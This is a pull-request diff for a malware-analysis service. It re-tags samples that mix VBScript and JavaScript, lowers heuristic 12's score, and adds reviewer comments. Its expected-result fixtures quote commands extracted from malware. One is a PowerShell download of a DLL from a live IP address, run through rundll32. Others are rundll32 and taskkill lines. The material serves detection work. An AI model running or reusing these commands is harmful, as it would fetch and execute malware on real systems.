Merge pull request #575 from CybercentreCanada/update/vbs-tag
Use post-process actions to resubmit to dynamic analysis, rather than relying on a high heuristic score
cccs-kevin committed Aug 16, 2023
2 parents b91a9d0 + 97bd99a commit e717ac0
Showing 9 changed files with 116 additions and 23 deletions.
1 change: 1 addition & 0 deletions jsjaws.py
Expand Up @@ -2024,6 +2024,7 @@ def _is_vb_and_js_scripts(self, scripts: ResultSet[PageElement], request: Servic
if vb_and_js_scripts:
heur = Heuristic(12)
vb_and_js_section = ResultTextSection(heur.name, heuristic=heur, parent=request.result, body=heur.description)
vb_and_js_section.add_tag("file.behavior", heur.name)

# We want to extract all VBScripts IFF there are both JavaScript and VBScript scripts in the file
for script in scripts:
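Review bot: The added `vb_and_js_section.add_tag("file.behavior", heur.name)` uses the heuristic's display name as the tag value, and per the commit message that exact value is what the post-process action resubmitting the file to dynamic analysis must match on. Because the heuristic's score is now 1, a later rename of heuristic 12 in service_manifest.yml would silently break the resubmission without any verdict change or test failure surfacing it. I would pin that coupling with a comment above the call: `# Post-process actions match this exact tag value to resubmit for dynamic analysis; keep in sync with heuristic 12's name in service_manifest.yml`. Whether the configured action keys on `file.behavior` specifically is not visible from this diff. `_is_vb_and_js_scripts` starts and ends outside the hunk.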
2 changes: 1 addition & 1 deletion service_manifest.yml
Expand Up @@ -194,7 +194,7 @@ heuristics:

- heur_id: 12
name: Visual Basic and JavaScript
score: 500
score: 1
filetype: '.*'
description: Sample uses a combination of both Visual Basic and JavaScript

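Review bot: With `score: 1`, a file that mixes VBScript and JavaScript no longer raises the static verdict on its own; detection now depends on a post-process action keyed on the new `file.behavior` tag being configured in the deployment, which this repository cannot guarantee. Nothing in the manifest tells a reader that the near-zero score is deliberate rather than a mistake. I would state it in the heuristic's own description, e.g. `description: Sample uses a combination of both Visual Basic and JavaScript (scored low on purpose; a post-process action on the file.behavior tag is expected to resubmit the file for dynamic analysis)`.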
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1402,
"score": 903,
"sections": [
{
"auto_collapse": false,
Expand Down Expand Up @@ -33,11 +33,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -405,6 +411,13 @@
"value": "cmd.exe cmd /c start /min powershell IWR -uri http://165.22.160.25/w9edb/160223 -o %temp%\\adeP1F.dll;start-process rundll32 %temp%\\adeP1F.dll N115"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 871,
"score": 372,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -229,6 +235,13 @@
"signatures": [],
"value": "flasks/data.txt"
}
],
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 750,
"score": 251,
"sections": [
{
"auto_collapse": false,
Expand All @@ -14,11 +14,17 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {}
},
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand Down Expand Up @@ -74,7 +80,15 @@
]
}
],
"tags": {},
"tags": {
"file.behavior": [
{
"heur_id": 12,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
]
},
"temp_submission_data": {}
}
}
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\index1.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -404,6 +410,13 @@
"value": "rundll32 C:\\ProgramData\\121.png,Wind "
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
@@ -1,7 +1,7 @@
{
"extra": {
"drop_file": false,
"score": 1632,
"score": 1133,
"sections": [
{
"auto_collapse": false,
Expand All @@ -11,7 +11,13 @@
"classification": "TLP:C",
"depth": 0,
"heuristic": null,
"tags": {},
"tags": {
"file": {
"behavior": [
"Visual Basic and JavaScript"
]
}
},
"title_text": "Visual Basic and JavaScript",
"zeroize_on_tag_safe": false
},
Expand All @@ -31,7 +37,7 @@
"attack_ids": [],
"frequency": 1,
"heur_id": 12,
"score": 500,
"score": 1,
"score_map": {},
"signatures": {
"suspicious_url_found": 1
Expand Down Expand Up @@ -410,6 +416,13 @@
"value": "taskkill /f /im mshta.exe"
}
],
"file.behavior": [
{
"heur_id": null,
"signatures": [],
"value": "Visual Basic and JavaScript"
}
],
"file.string.extracted": [
{
"heur_id": 2,
